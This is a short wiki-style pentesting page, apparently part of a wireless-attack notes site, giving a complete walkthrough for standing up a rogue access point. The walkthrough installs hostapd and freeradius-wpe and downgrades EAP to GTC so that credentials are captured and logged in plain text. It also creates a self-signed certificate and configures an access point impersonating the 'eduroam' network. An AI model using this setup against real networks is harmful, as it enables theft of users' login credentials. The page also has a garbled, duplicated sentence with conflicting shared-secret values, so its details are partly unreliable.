RogueAP

A RogueAP is an unauthorized Access Point that can be used for malicious activities like intercepting data.

Necesary software: HostAPD and FreeRadius:

apt-get install hostapd freeradius-wpe

Then, enable monitor mode:

airmon-ng check kill

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

Then, modify card power:

ifconfig wlan0 down

iwconfig wlan0 txpower 28

ifconfig wlan0 up

Then, configure FreeRadius-wpe:

nano /etc/freeradius-wpe/3.0/mods-enabled/eap

Here, modify -L#790:

Change default_eap_type = mschapv2 to default_eap_type = gtc

Now the transmission of credentials is done in plain text and the Radius server keeps a log with the obtained credentials in /var/log/freeradius-wpe/freeradius-server-wpe.log.

After that, create the certificate with the desired name:

cd /etc/freeradius-wpe/3.0/certs/

mkdir example-cert

cd example-cert

openssl genrsa -out server.key 2048

openssl req -new -key server.key -out server.csr -subj "/CN=example.com"

openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.pem

Now edit the private key and certificate path:

nano /etc/freeradius-wpe/3.0/mods-enabled/eap

private_key_file = /etc/freeradius-wpe/3.0/certs/example-cert/server.key
certificate_file = /etc/freeradius-wpe/3.0/certs/example-cert/server.pem

Now, configure HostAPD:

It is necessary to create a configuration file in the hostapd directory specifying the access point information, as well as the authentication against the Radius server. Example:

nano rogueAP

interface=wlan0
driver=nl80211
country_code=ES
logger_stdout=-1
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
rsn_pairwise=CCMP
ssid=eduroam
channel=6

Note that auth_server_shared_secret parameter is the secret key shared between the Radius server and the client (HostAPd in this case). It must match the one set in the clients.conf file, located in /etc/freeradius-wpe/3.0/ (auth_server_shared_secret=testing1234) Secret key shared between the Radius server and the client (HostAPd in this case). It must match the one set in the clients.conf file, located in /etc/freeradius-wpe/3.0/.

Now the attack can be executed:

In a terminal run: freeradius-wpe -f

In another terminal run: hostapd rogueAP

In another terminal run: touch /var/log/freeradius-wpe/freeradius-server-wpe.log and finally tail -f /var/log/freeradius-wpe/freeradius-server-wpe.log

PreviousWifiteNextWiFi Pineapple Mark VII

Last updated